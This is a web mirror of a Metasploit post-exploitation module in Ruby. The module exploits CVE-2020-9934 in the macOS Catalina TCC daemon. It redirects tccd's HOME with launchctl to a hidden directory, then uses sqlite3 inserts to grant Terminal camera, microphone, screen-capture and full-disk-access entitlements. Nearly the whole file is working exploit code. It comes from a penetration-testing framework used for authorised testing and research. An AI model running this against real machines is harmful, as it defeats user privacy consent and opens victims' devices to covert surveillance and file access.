CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/osx/escalate/tccbypass.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  include Msf::Post::File

9
  include Msf::Post::OSX::Priv

10
  include Msf::Post::OSX::System

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Bypass the macOS TCC Framework',

17
        'Description' => %q{

18
          This module exploits a vulnerability in the TCC daemon on macOS Catalina

19
          (<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be

20
          manipulated (by setting the HOME environment variable) to use a new user

21
          controlled location as the TCC database. We can then grant ourselves

22
          entitlements by inserting them into this new database.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'mattshockl', # discovery

27
          'timwr', # metasploit module

28
        ],

29
        'References' => [

30
          ['CVE', '2020-9934'],

31
          ['URL', 'https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8'],

32
          ['URL', 'https://github.com/mattshockl/CVE-2020-9934'],

33
        ],

34
        'Notes' => {

35
          'Stability' => [CRASH_SAFE],

36
          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],

37
          'Reliability' => []

38
        },

39
        'Platform' => [ 'osx' ],

40
        'SessionTypes' => [ 'shell', 'meterpreter' ]

41
      )

42
    )

43
    register_advanced_options([

44
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])

45
    ])

46
  end

47


48
  def check

49
    system_version = get_system_version

50
    unless system_version

51
      return Exploit::CheckCode::Unknown

52
    end

53


54
    version = Rex::Version.new(system_version)

55
    if version >= Rex::Version.new('10.15.6')

56
      return Exploit::CheckCode::Safe

57
    elsif version < Rex::Version.new('10.15.0')

58
      return Exploit::CheckCode::Unknown

59
    else

60
      return Exploit::CheckCode::Appears

61
    end

62
  end

63


64
  def run

65
    if check != Exploit::CheckCode::Appears

66
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

67
    end

68


69
    unless writable? datastore['WritableDir']

70
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"

71
    end

72


73
    tmpdir = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha(8)}"

74
    tccdir = "#{tmpdir}/Library/Application Support/com.apple.TCC"

75
    tccdb = "#{tccdir}/TCC.db"

76


77
    print_status("Creating TCC directory #{tccdir}")

78
    cmd_exec("mkdir -p '#{tccdir}'")

79
    cmd_exec("launchctl setenv HOME '#{tmpdir}'")

80
    cmd_exec('launchctl stop com.apple.tccd && launchctl start com.apple.tccd')

81
    unless file_exist?(tccdb)

82
      print_error("No fake TCC DB found: #{tccdb}")

83
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

84
    end

85
    print_good("fake TCC DB found: #{tccdb}")

86


87
    tcc_services = [

88
      'kTCCServiceCamera', 'kTCCServiceMicrophone', 'kTCCServiceAll', 'kTCCServiceScreenCapture', 'kTCCServiceSystemPolicyDocumentsFolder', 'kTCCService',

89
      'kTCCServiceSystemPolicyDeveloperFiles', 'kTCCServiceSystemPolicyDesktopFolder', 'kTCCServiceSystemPolicyAllFiles', 'kTCCServiceSystemPolicyNetworkVolumes',

90
      'kTCCServiceSystemPolicySysAdminFiles', 'kTCCServiceSystemPolicyDownloadsFolder'

91
    ]

92
    bundle = 'com.apple.Terminal'

93
    csreq = 'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003'

94
    isfile = '0'

95
    timestamp = 1.year.from_now.to_i.to_s

96
    for service in tcc_services

97
      sql_insert = "INSERT INTO access VALUES('#{service}', '#{bundle}', #{isfile}, 1, 1, X'#{csreq}', NULL, NULL, 'UNUSED', NULL, NULL, #{timestamp});"

98
      sqloutput = cmd_exec("sqlite3 '#{tccdb}' \"#{sql_insert}\"")

99
      if sqloutput && !sqloutput.empty?

100
        print_error("Output: #{sqloutput.length}")

101
      end

102
    end

103
    print_good('TCC.db was successfully updated!')

104
    cleanup_command = 'launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd'

105
    cleanup_command << "\nrm -rf '#{tmpdir}'"

106
    print_status("To cleanup, run:\n#{cleanup_command}\n")

107
  end

108
end

109


110